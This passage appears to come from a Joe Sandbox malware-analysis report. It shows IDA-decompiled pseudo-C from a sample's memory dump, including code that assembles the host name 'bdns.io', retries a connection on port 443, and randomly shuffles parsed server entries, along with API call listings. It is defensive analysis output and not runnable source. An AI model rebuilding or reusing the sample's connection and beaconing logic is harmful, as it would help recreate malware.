											 *((intOrPtr*)( *((intOrPtr*)(_t121 + 0xc8))))(0x7530);
											__eflags = _t153 - 0x64;
											if(_t153 < 0x64) {
												continue;
											}
											break;
										}
										L49:
										__eflags = _t153 - 0x64;
										if(_t153 != 0x64) {
											 *((intOrPtr*)(_t154 - 0x18)) = 1;
										}
										goto L51;
									}
									L43:
									_t144 =  *((intOrPtr*)(_t154 - 4));
									__eflags = _t144;
									if(_t144 != 0) {
										E00391380(_t144);
										_push(_t144);
										L00391CB0();
										_t157 = _t157 + 4;
									}
									goto L45;
								}
								L36:
								_t142 =  *((intOrPtr*)(_t154 - 4));
								__eflags = _t142;
								if(_t142 != 0) {
									E00392DE0(_t142);
									_push(_t142);
									L00391CB0();
									_t157 = _t157 + 4;
								}
								goto L38;
							}
							L20:
							do {
								L21:
								_t139 =  *_t117;
								__eflags = _t139 - 0x30;
								if(_t139 < 0x30) {
									L23:
									__eflags = _t139 - 0x2e;
									if(_t139 != 0x2e) {
										goto L25;
									}
									goto L24;
								}
								L22:
								__eflags = _t139 - 0x39;
								if(_t139 <= 0x39) {
									goto L24;
								}
								goto L23;
								L24:
								_t117 = _t117 + 1;
								__eflags = _t117 - _t149;
							} while (_t117 < _t149);
							goto L25;
						} else {
							goto L16;
						}
						do {
							L16:
							_t127 =  *_t86;
							__eflags = _t127 - 0x30;
							if(_t127 < 0x30) {
								goto L18;
							}
							L17:
							__eflags = _t127 - 0x39;
							if(_t127 <= 0x39) {
								goto L19;
							}
							L18:
							_t86 = _t86 + 1;
							__eflags = _t86 - _t149;
						} while (_t86 < _t149);
						goto L19;
					}
					L11:
					_t106 =  *0x3b8628; // 0x593938
					_t102 = _t102 + 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0xc8))))("h N");
					if(_t102 < 0x1e) {
						L1:
						 *((intOrPtr*)(_t154 - 0x8c)) = 0x6f692e;
						 *((intOrPtr*)(_t154 - 0x90)) = 0x736e6462;
						_t60 = E00391170(_t154 - 0x90, 0xfde9, _t154 - 0x10, 0xffffffff);
						_t157 = _t157 + 0x10;
						_t161 = _t60;
						if(_t60 == 0) {
							goto L51;
						}
						L2:
						_t146 =  *((intOrPtr*)(_t154 - 0x10));
						_t76 = E003B1280(_t161,  *((intOrPtr*)(_t154 - 0x10)));
						_t157 = _t157 + 4;
						_push(0x1c);
						if(_t76 == 0) {
							L4:
							L0039A47E();
							_t157 = _t157 + 4;
							__eflags = _t76;
							if(_t76 == 0) {
								goto L6;
							} else {
								 *((intOrPtr*)(_t154 - 0x1c)) = E003B1D30(_t76);
								L7:
								_push(0x1bb);
								_push(_t146);
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 - 0x1c)))) + 8))))() == 0) {
									goto L11;
								}
								goto L8;
							}
						} else {
							continue;
						}
					}
					L12:
					goto L51;
					L6:
					 *((intOrPtr*)(_t154 - 0x1c)) = 0;
					goto L7;
				}
			}











































    0x003b0daa
    0x003b0daa
    0x003b0daa
    0x003b0daa
    0x003b0daa
    0x003b0daa
    0x003b0daa
    0x003b0daf
    0x003b0db4
    0x00000000
    0x003b0db6
    0x003b0dbd
    0x003b0dc0
    0x003b0dc0
    0x003b0df5
    0x003b0dfb
    0x003b0e07
    0x003b0e0e
    0x003b0e18
    0x003b0e22
    0x003b0e2c
    0x003b0e32
    0x003b0e37
    0x003b0e3c
    0x003b1037
    0x003b1037
    0x003b103f
    0x003b1042
    0x003b1047
    0x003b1047
    0x003b104a
    0x003b104f
    0x003b1052
    0x003b1057
    0x003b1057
    0x003b105a
    0x003b105f
    0x003b1062
    0x003b1067
    0x003b1067
    0x003b106a
    0x003b106f
    0x003b1072
    0x003b1077
    0x003b1077
    0x003b107a
    0x003b107f
    0x003b1081
    0x003b1082
    0x003b1087
    0x003b108a
    0x003b109a
    0x003b109c
    0x003b10a2
    0x003b10b3
    0x003b10bb
    0x003b10bb
    0x003b0e42
    0x003b0e42
    0x003b0e4f
    0x003b0e50
    0x003b0e57
    0x003b0e84
    0x003b0e93
    0x003b0e95
    0x003b0e97
    0x00000000
    0x00000000
    0x003b0e9d
    0x003b0e9d
    0x003b0ea0
    0x003b0ea3
    0x00000000
    0x00000000
    0x003b0ea9
    0x003b0ea9
    0x003b0eac
    0x003b0eaf
    0x003b0eb1
    0x003b0ec4
    0x003b0ec4
    0x003b0ec6
    0x003b0ec8
    0x003b0ee6
    0x003b0ee6
    0x003b0ee8
    0x003b0eeb
    0x00000000
    0x00000000
    0x003b0ef1
    0x003b0ef1
    0x003b0ef4
    0x00000000
    0x00000000
    0x003b0efa
    0x003b0f02
    0x003b0f07
    0x003b0f0a
    0x003b0f0c
    0x00000000
    0x00000000
    0x003b0f12
    0x003b0f12
    0x003b0f15
    0x003b0f15
    0x003b0f17
    0x003b0f17
    0x003b0f22
    0x003b0f27
    0x003b0f29
    0x00000000
    0x00000000
    0x003b0f2b
    0x003b0f2b
    0x003b0f3b
    0x003b0f3c
    0x003b0f3e
    0x003b0f41
    0x00000000
    0x00000000
    0x00000000
    0x003b0f41
    0x003b0f43
    0x003b0f43
    0x003b0f46
    0x00000000
    0x00000000
    0x003b0f4c
    0x003b0f4c
    0x003b0f4c
    0x003b0f4e
    0x003b0f51
    0x003b0f51
    0x003b0f5a
    0x003b0f5f
    0x003b0f62
    0x003b0f64
    0x00000000
    0x00000000
    0x003b0f66
    0x003b0f66
    0x003b0f77
    0x003b0f78
    0x003b0f7a
    0x003b0f7d
    0x00000000
    0x00000000
    0x003b0f7f
    0x003b0f98
    0x003b0f98
    0x003b0f9b
    0x00000000
    0x00000000
    0x003b0fa1
    0x003b0fa1
    0x003b0fa4
    0x003b0fa4
    0x003b0fa6
    0x003b0fb0
    0x003b0fb0
    0x003b0fb6
    0x003b0fbb
    0x003b0fbe
    0x003b0fc0
    0x00000000
    0x00000000
    0x003b0fc2
    0x003b0fc2
    0x003b0fd3
    0x003b0fd4
    0x003b0fd6
    0x003b0fd9
    0x00000000
    0x00000000
    0x003b0fdb
    0x003b0ff4
    0x003b0ff4
    0x003b0ff7
    0x00000000
    0x00000000
    0x003b0ff9
    0x003b0ff9
    0x003b0ff9
    0x003b0ffb
    0x003b1000
    0x003b1000
    0x003b1006
    0x003b100b
    0x003b100e
    0x003b1010
    0x00000000
    0x00000000
    0x003b1012
    0x003b1012
    0x003b1023
    0x003b1024
    0x003b1026
    0x003b1029
    0x00000000
    0x00000000
    0x00000000
    0x003b1029
    0x003b102b
    0x003b102b
    0x003b102e
    0x003b1030
    0x003b1030
    0x00000000
    0x003b102e
    0x003b0fdd
    0x003b0fdd
    0x003b0fe0
    0x003b0fe2
    0x003b0fe6
    0x003b0feb
    0x003b0fec
    0x003b0ff1
    0x003b0ff1
    0x00000000
    0x003b0fe2
    0x003b0f81
    0x003b0f81
    0x003b0f84
    0x003b0f86
    0x003b0f8a
    0x003b0f8f
    0x003b0f90
    0x003b0f95
    0x003b0f95
    0x00000000
    0x003b0f86
    0x00000000
    0x003b0ed0
    0x003b0ed0
    0x003b0ed0
    0x003b0ed2
    0x003b0ed5
    0x003b0edc
    0x003b0edc
    0x003b0edf
    0x00000000
    0x00000000
    0x00000000
    0x003b0edf
    0x003b0ed7
    0x003b0ed7
    0x003b0eda
    0x00000000
    0x00000000
    0x00000000
    0x003b0ee1
    0x003b0ee1
    0x003b0ee2
    0x003b0ee2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003b0eb3
    0x003b0eb3
    0x003b0eb3
    0x003b0eb5
    0x003b0eb8
    0x00000000
    0x00000000
    0x003b0eba
    0x003b0eba
    0x003b0ebd
    0x00000000
    0x00000000
    0x003b0ebf
    0x003b0ebf
    0x003b0ec0
    0x003b0ec0
    0x00000000
    0x003b0eb3
    0x003b0e62
    0x003b0e62
    0x003b0e73
    0x003b0e74
    0x003b0e79
    0x003b0d60
    0x003b0d72
    0x003b0d7c
    0x003b0d86
    0x003b0d8b
    0x003b0d8e
    0x003b0d90
    0x00000000
    0x00000000
    0x003b0d96
    0x003b0d9a
    0x003b0d9c
    0x003b0da1
    0x003b0da4
    0x003b0da8
    0x003b0dc2
    0x003b0dc2
    0x003b0dc7
    0x003b0dca
    0x003b0dcc
    0x00000000
    0x003b0dce
    0x003b0dd5
    0x003b0de1
    0x003b0de9
    0x003b0dee
    0x003b0df3
    0x00000000
    0x00000000
    0x00000000
    0x003b0df3
    0x00000000
    0x00000000
    0x00000000
    0x003b0da8
    0x003b0e7f
    0x00000000
    0x003b0dda
    0x003b0dda
    0x00000000
    0x003b0dda

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003B0DAA
    • ??3@YAXPAX@Z.MSVCRT ref: 003B1082
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00393E30, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 384
    C-Code - Quality: 72%
    			E00393E30(intOrPtr __ecx, intOrPtr* _a4) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr _v56;
				short _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v280;
				signed int _t171;
				signed int _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr* _t180;
				intOrPtr _t188;
				signed int _t198;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				intOrPtr* _t212;
				void* _t214;
				intOrPtr* _t218;
				signed int _t220;
				intOrPtr _t227;
				intOrPtr _t229;
				intOrPtr _t230;
				intOrPtr _t231;
				signed int _t234;
				signed int _t236;
				signed int _t242;
				signed int _t244;
				intOrPtr _t267;
				intOrPtr _t271;
				intOrPtr _t274;
				signed int _t276;
				intOrPtr* _t277;
				signed int _t278;
				intOrPtr* _t279;
				intOrPtr* _t293;
				signed int _t304;
				intOrPtr* _t306;
				intOrPtr _t308;
				intOrPtr _t310;
				signed int _t312;
				intOrPtr* _t313;
				void* _t314;
				intOrPtr _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;

				_t306 = _a4;
				_t244 = 0;
				_t310 = __ecx;
				_push( &_v60);
				_push(_t306);
				_v56 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v52 = 0;
				_v40 = 0;
				_v60 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *_t306 + 0x58))))() < 0 || _v60 != 0xffff) {
					L62:
					_t171 = _v24;
					if(_t171 != _t244) {
						__imp__#6(_t171);
					}
					_t172 = _v20;
					if(_t172 != _t244) {
						__imp__#6(_t172);
					}
					_t173 = _v16;
					if(_t173 != _t244) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 8))))(_t173);
					}
					_t174 = _v40;
					if(_t174 != _t244) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))(_t174);
					}
					return _v52;
				} else {
					_push( &_v40);
					_push(_t306);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t306 + 0x30))))() < 0) {
						goto L62;
					}
					_t180 = _v40;
					_push( &_v8);
					_push(_t180);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x20))))() < 0) {
						goto L62;
					}
					_v28 = E003A1D90(_v8 * 4, 0);
					_v32 = E003A1D90(_v8 * 4, 0);
					_t308 = E003A1D90(_v8 * 8, 0);
					_t188 = E003A1D90(_v8 * 8, 0);
					_t318 = _t317 + 0x20;
					_v68 = _t188;
					if(_v28 == 0) {
						L60:
						_t189 = _v32;
						if(_v32 != _t244) {
							E0039BB40(_t189);
						}
						goto L62;
					}
					if(_v32 == 0 || _t308 == 0 || _t188 == 0) {
						L59:
						E0039BB40(_v28);
						_t318 = _t318 + 4;
						goto L60;
					} else {
						if(_v8 <= 0) {
							L46:
							_t192 =  *((intOrPtr*)(_t310 + 0x1c));
							if( *((intOrPtr*)(_t310 + 0x1c)) != 0) {
								E0039BB40(_t192);
								_t318 = _t318 + 4;
							}
							_t193 =  *((intOrPtr*)(_t310 + 0x20));
							if( *((intOrPtr*)(_t310 + 0x20)) != 0) {
								E0039BB40(_t193);
								_t318 = _t318 + 4;
							}
							 *((intOrPtr*)(_t310 + 0x1c)) = E003A1D90(_v8 * 4, 0);
							 *((intOrPtr*)(_t310 + 0x20)) = E003A1D90(_v8 * 4, 0);
							_t198 = 0;
							_t318 = _t318 + 0x10;
							if(_v8 <= 0) {
								L53:
								_t199 =  *((intOrPtr*)(_t310 + 0x24));
								if( *((intOrPtr*)(_t310 + 0x24)) != 0) {
									E0039BB40(_t199);
									_t318 = _t318 + 4;
								}
								_t200 =  *((intOrPtr*)(_t310 + 0x28));
								if( *((intOrPtr*)(_t310 + 0x28)) != 0) {
									E0039BB40(_t200);
									_t318 = _t318 + 4;
								}
								 *((intOrPtr*)(_t310 + 0x24)) = _t308;
								 *((intOrPtr*)(_t310 + 0x28)) = _v68;
								 *((intOrPtr*)(_t310 + 0x18)) = _v8;
								_v52 = 1;
								L58:
								_t244 = 0;
								goto L59;
							} else {
								do {
									 *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x1c)) + _t198 * 4)) =  *((intOrPtr*)(_v28 +  *(_t308 + _t198 * 8) * 4));
									 *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x20)) + _t198 * 4)) =  *((intOrPtr*)(_v32 +  *(_t308 + _t198 * 8) * 4));
									 *(_t308 + _t198 * 8) = 0;
									 *(_t308 + 4 + _t198 * 8) = 0;
									_t198 = _t198 + 1;
								} while (_t198 < _v8);
								goto L53;
							}
						}
						_t293 = _v28;
						_a4 = _t308;
						_v48 = _t293;
						_v64 = _v32 - _t293;
						_v80 = _t188 - _t308;
						while(1) {
							_t207 = _v20;
							if(_t207 != 0) {
								__imp__#6(_t207);
							}
							_t208 = _v24;
							_v20 = 0;
							if(_t208 != 0) {
								__imp__#6(_t208);
							}
							_t209 = _v40;
							_push( &_v16);
							_v24 = 0;
							_push(_t244);
							_push(_t209);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t209 + 0x1c))))() < 0) {
								goto L58;
							}
							_t212 = _v16;
							_t214 =  *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0xa4))))(_t212,  &_v24);
							_t334 = _t214;
							if(_t214 < 0) {
								goto L58;
							}
							E00399090(_t334,  &_v280, 0x28);
							_t267 =  *0x3b8628; // 0x593938
							_t318 = _t318 + 8;
							_push( &_v280);
							_push(_v24);
							if( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0xe0))))() != 0) {
								L45:
								_t218 = _v16;
								 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 8))))(_t218);
								_v48 = _v48 + 4;
								_a4 = _a4 + 8;
								_t244 = _t244 + 1;
								_v16 = 0;
								if(_t244 < _v8) {
									continue;
								}
								goto L46;
							}
							_t220 = _v16;
							_push( &_v20);
							_push(_t220);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t220 + 0x68))))() < 0) {
								goto L58;
							}
							_t312 = E00397B80(_v20, 0x3b330c,  &_v12, 2);
							_t320 = _t318 + 0x10;
							if(_t312 != 2) {
								__eflags = _t312;
								if(_t312 <= 0) {
									L73:
									E0039BB40(_v12);
									_t318 = _t320 + 4;
									goto L58;
								} else {
									goto L72;
								}
								do {
									L72:
									_t271 =  *((intOrPtr*)(_v12 + _t312 * 4 - 4));
									_t312 = _t312 - 1;
									E0039BB40(_t271);
									_t320 = _t320 + 4;
									__eflags = _t312;
								} while (_t312 > 0);
								goto L73;
							}
							_t227 = _v12;
							__imp___wtoi( *((intOrPtr*)(_t227 + 4)));
							_t313 = _v48;
							 *((intOrPtr*)(_v64 + _t313)) = _t227;
							_t229 = E003966C0( *_v12);
							_t274 = _v80;
							 *_t313 = _t229;
							_t230 = _a4;
							_t321 = _t320 + 8;
							 *(_t274 + _t230) = 0;
							 *(_t274 + _t230 + 4) = 0;
							_t314 = 8;
							do {
								_t231 =  *((intOrPtr*)(_t314 + _v12 - 4));
								_t314 = _t314 - 4;
								E0039BB40(_t231);
								_t321 = _t321 + 4;
							} while (_t314 > 0);
							E0039BB40(_v12);
							_t318 = _t321 + 4;
							_v44 = 0;
							do {
								_t234 = rand();
								asm("cdq");
								_t304 = _t234 % _v8;
								_t276 = 0;
								_t236 = _t304;
								_v36 = _t236;
								if(_t244 <= 0) {
									L27:
									if(_t276 == _t244) {
										_t277 = _a4;
										asm("cdq");
										 *_t277 = _v36;
										 *(_t277 + 4) = _t304;
										L31:
										if(_v44 != 0x3e8) {
											L44:
											_t310 = _v56;
											goto L45;
										}
										_t316 = _v36 + 1;
										if(_t316 == _v36) {
											goto L44;
										} else {
											goto L33;
										}
										do {
											L33:
											if(_t316 == _v8) {
												_t316 = 0;
											}
											_t278 = 0;
											if(_t244 <= 0) {
												L40:
												if(_t278 == _t244) {
													_t279 = _a4;
													asm("cdq");
													 *_t279 = _t316;
													 *(_t279 + 4) = _t304;
													goto L44;
												}
											} else {
												asm("cdq");
												_v76 = _t316;
												_v72 = _t304;
												while(1) {
													_t304 =  *(_t308 + _t278 * 8);
													if(_t304 == _v76 &&  *((intOrPtr*)(_t308 + 4 + _t278 * 8)) == _v72) {
														goto L40;
													}
													_t278 = _t278 + 1;
													if(_t278 < _t244) {
														continue;
													}
													goto L40;
												}
												goto L40;
											}
											_t316 = _t316 + 1;
										} while (_t316 != _v36);
										goto L44;
									}
									goto L28;
								}
								asm("cdq");
								while( *((intOrPtr*)(_t308 + _t276 * 8)) != _t236 ||  *((intOrPtr*)(_t308 + 4 + _t276 * 8)) != _t304) {
									_t276 = _t276 + 1;
									if(_t276 < _t244) {
										continue;
									}
									goto L27;
								}
								goto L27;
								L28:
								_t242 = _v44 + 1;
								_v44 = _t242;
							} while (_t242 < 0x3e8);
							goto L31;
						}
						goto L58;
					}
				}
			}

































































    0x00393e3c
    0x00393e44
    0x00393e46
    0x00393e4b
    0x00393e4c
    0x00393e4d
    0x00393e50
    0x00393e53
    0x00393e56
    0x00393e59
    0x00393e5c
    0x00393e5f
    0x00393e62
    0x00393e65
    0x00393e6c
    0x00394227
    0x00394227
    0x0039422c
    0x0039422f
    0x0039422f
    0x00394235
    0x0039423a
    0x0039423d
    0x0039423d
    0x00394243
    0x00394248
    0x00394250
    0x00394250
    0x00394252
    0x0039425a
    0x00394262
    0x00394262
    0x0039426a
    0x00393e7d
    0x00393e85
    0x00393e86
    0x00393e8b
    0x00000000
    0x00000000
    0x00393e91
    0x00393e99
    0x00393e9a
    0x00393ea2
    0x00000000
    0x00000000
    0x00393eb9
    0x00393ed0
    0x00393eed
    0x00393eef
    0x00393ef4
    0x00393ef7
    0x00393efd
    0x00394217
    0x00394217
    0x0039421c
    0x0039421f
    0x00394224
    0x00000000
    0x0039421c
    0x00393f06
    0x0039420b
    0x0039420f
    0x00394214
    0x00000000
    0x00393f1c
    0x00393f1f
    0x00394144
    0x00394144
    0x00394149
    0x0039414c
    0x00394151
    0x00394151
    0x00394154
    0x00394159
    0x0039415c
    0x00394161
    0x00394161
    0x00394179
    0x0039418b
    0x0039418e
    0x00394190
    0x00394196
    0x003941d3
    0x003941d3
    0x003941d8
    0x003941db
    0x003941e0
    0x003941e0
    0x003941e3
    0x003941e8
    0x003941eb
    0x003941f0
    0x003941f0
    0x003941f9
    0x003941fc
    0x003941ff
    0x00394202
    0x00394209
    0x00394209
    0x00000000
    0x00394198
    0x003941a0
    0x003941af
    0x003941bb
    0x003941be
    0x003941c5
    0x003941cd
    0x003941ce
    0x00000000
    0x003941a0
    0x00394196
    0x00393f25
    0x00393f2f
    0x00393f32
    0x00393f35
    0x00393f38
    0x00393f40
    0x00393f40
    0x00393f45
    0x00393f48
    0x00393f48
    0x00393f4e
    0x00393f51
    0x00393f5a
    0x00393f5d
    0x00393f5d
    0x00393f63
    0x00393f69
    0x00393f6a
    0x00393f73
    0x00393f74
    0x00393f7c
    0x00000000
    0x00000000
    0x00393f82
    0x00393f92
    0x00393f94
    0x00393f96
    0x00000000
    0x00000000
    0x00393fa5
    0x00393fad
    0x00393fb3
    0x00393fbc
    0x00393fc3
    0x00393fc8
    0x00394120
    0x00394120
    0x00394129
    0x0039412b
    0x0039412f
    0x00394133
    0x00394134
    0x0039413e
    0x00000000
    0x00000000
    0x00000000
    0x0039413e
    0x00393fce
    0x00393fd6
    0x00393fd7
    0x00393fdf
    0x00000000
    0x00000000
    0x00393ff9
    0x00393ffb
    0x00394001
    0x0039426d
    0x0039426f
    0x00394286
    0x0039428a
    0x0039428f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00394271
    0x00394271
    0x00394274
    0x00394278
    0x0039427a
    0x0039427f
    0x00394282
    0x00394282
    0x00000000
    0x00394271
    0x00394007
    0x0039400e
    0x00394017
    0x0039401a
    0x00394023
    0x00394028
    0x0039402b
    0x0039402d
    0x00394030
    0x00394033
    0x0039403a
    0x00394042
    0x00394050
    0x00394053
    0x00394057
    0x0039405b
    0x00394060
    0x00394063
    0x0039406b
    0x00394070
    0x00394073
    0x00394080
    0x00394080
    0x00394086
    0x00394087
    0x0039408a
    0x0039408c
    0x0039408e
    0x00394093
    0x003940a6
    0x003940a8
    0x003940bd
    0x003940c0
    0x003940c1
    0x003940c3
    0x003940c6
    0x003940cd
    0x0039411d
    0x0039411d
    0x00000000
    0x0039411d
    0x003940d2
    0x003940d6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003940d8
    0x003940d8
    0x003940db
    0x003940dd
    0x003940dd
    0x003940df
    0x003940e3
    0x00394106
    0x00394108
    0x00394112
    0x00394117
    0x00394118
    0x0039411a
    0x00000000
    0x0039411a
    0x003940e5
    0x003940e7
    0x003940e8
    0x003940eb
    0x003940f0
    0x003940f0
    0x003940f6
    0x00000000
    0x00000000
    0x00394101
    0x00394104
    0x00000000
    0x00000000
    0x00000000
    0x00394104
    0x00000000
    0x003940f0
    0x0039410a
    0x0039410b
    0x00000000
    0x00394110
    0x00000000
    0x003940a8
    0x00394095
    0x00394096
    0x003940a1
    0x003940a4
    0x00000000
    0x00000000
    0x00000000
    0x003940a4
    0x00000000
    0x003940aa
    0x003940ad
    0x003940ae
    0x003940b1
    0x00000000
    0x003940b8
    0x00000000
    0x00393f40
    0x00393f06

    APIs
    • SysFreeString.OLEAUT32(?), ref: 00393F48
    • SysFreeString.OLEAUT32(?), ref: 00393F5D
    • _wtoi.MSVCRT ref: 0039400E
    • rand.MSVCRT ref: 00394080
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • SysFreeString.OLEAUT32(?), ref: 0039422F
    • SysFreeString.OLEAUT32(?), ref: 0039423D
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039BF60, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 336
    C-Code - Quality: 71%
    			E0039BF60(intOrPtr __ecx, signed int* _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				short _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v256;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr* _t137;
				signed int* _t144;
				intOrPtr _t148;
				intOrPtr _t156;
				signed int _t157;
				char _t163;
				char _t164;
				intOrPtr* _t165;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr* _t174;
				intOrPtr* _t176;
				intOrPtr _t183;
				signed int _t189;
				signed int _t191;
				signed int _t192;
				signed int* _t194;
				signed int _t205;
				intOrPtr _t212;
				signed int _t220;
				intOrPtr _t242;
				signed int _t243;
				signed int _t246;
				intOrPtr _t248;
				intOrPtr* _t250;
				intOrPtr _t252;
				signed int _t255;
				intOrPtr* _t257;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t261;
				void* _t263;
				void* _t264;

				_t250 = _a4;
				_t246 = 0;
				_v52 = __ecx;
				_push( &_v40);
				_push(_t250);
				_v8 = 0;
				_v20 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v36 = 0;
				_v28 = 0;
				_v40 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x58))))() >= 0 && _v40 == 0xffff) {
					_push( &_v28);
					_push(_t250);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x30))))() >= 0) {
						_t137 = _v28;
						_push( &_v8);
						_push(_t137);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x20))))() >= 0) {
							_t252 = E003A1D90(_v8 * 4, 0);
							_v44 = _t252;
							_v32 = E003A1D90(_v8 * 4, 0);
							_t144 = E003A1D90(_v8 * 8, 0);
							_t261 = _t260 + 0x18;
							_t194 = _t144;
							if(_t252 != 0) {
								_t148 = _v32;
								if(_t148 != 0) {
									if(_v8 <= 0) {
										L41:
										_t248 = _v52;
										_t151 =  *((intOrPtr*)(_t248 + 0x1c));
										if( *((intOrPtr*)(_t248 + 0x1c)) != 0) {
											E0039BB40(_t151);
											_t261 = _t261 + 4;
										}
										_t152 =  *((intOrPtr*)(_t248 + 0x20));
										if( *((intOrPtr*)(_t248 + 0x20)) != 0) {
											E0039BB40(_t152);
											_t261 = _t261 + 4;
										}
										 *((intOrPtr*)(_t248 + 0x1c)) = E003A1D90(_v8 * 4, 0);
										_t156 = E003A1D90(_v8 * 4, 0);
										_t205 = _v8;
										 *((intOrPtr*)(_t248 + 0x20)) = _t156;
										_t261 = _t261 + 0x10;
										_t157 = 0;
										if(_t205 > 0) {
											do {
												 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x1c)) + _t157 * 4)) =  *((intOrPtr*)(_v44 +  *(_t194 + _t157 * 4) * 4));
												 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x20)) + _t157 * 4)) =  *((intOrPtr*)(_v32 +  *(_t194 + _t157 * 4) * 4));
												_t205 = _v8;
												_t157 = _t157 + 1;
											} while (_t157 < _t205);
										}
										 *((intOrPtr*)(_t248 + 0x18)) = _t205;
										 *((intOrPtr*)(_t248 + 0x24)) = 0;
										_v36 = 1;
									} else {
										_v56 = _t148 - _t252;
										_a4 = _t194;
										_v48 = _t252 - _t194;
										while(1) {
											_t163 = _v20;
											if(_t163 != 0) {
												__imp__#6(_t163);
											}
											_t164 = _v24;
											_v20 = 0;
											if(_t164 != 0) {
												__imp__#6(_t164);
											}
											_t165 = _v28;
											_push( &_v16);
											_v24 = 0;
											_push(_t246);
											_push(_t165);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x1c))))() < 0) {
												goto L48;
											}
											_t168 = _v16;
											_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_t168 + 0xa4))))(_t168,  &_v24);
											_t276 = _t170;
											if(_t170 >= 0) {
												E00399090(_t276,  &_v256, 0x48);
												_t212 =  *0x3b8628; // 0x593938
												_t261 = _t261 + 8;
												_push( &_v256);
												_push(_v24);
												if( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0xe0))))() != 0) {
													L40:
													_t174 = _v16;
													 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))(_t174);
													_a4 =  &(_a4[1]);
													_t246 = _t246 + 1;
													_v16 = 0;
													if(_t246 < _v8) {
														continue;
													} else {
														goto L41;
													}
												} else {
													_t176 = _v16;
													_push( &_v20);
													_push(_t176);
													if( *((intOrPtr*)( *((intOrPtr*)( *_t176 + 0x68))))() >= 0) {
														_t255 = E00397B80(_v20, 0x3b330c,  &_v12, 2);
														_t263 = _t261 + 0x10;
														if(_t255 != 2) {
															__eflags = _t255;
															while(_t255 > 0) {
																_t123 = _t255 * 4; // 0x2080
																_t255 = _t255 - 1;
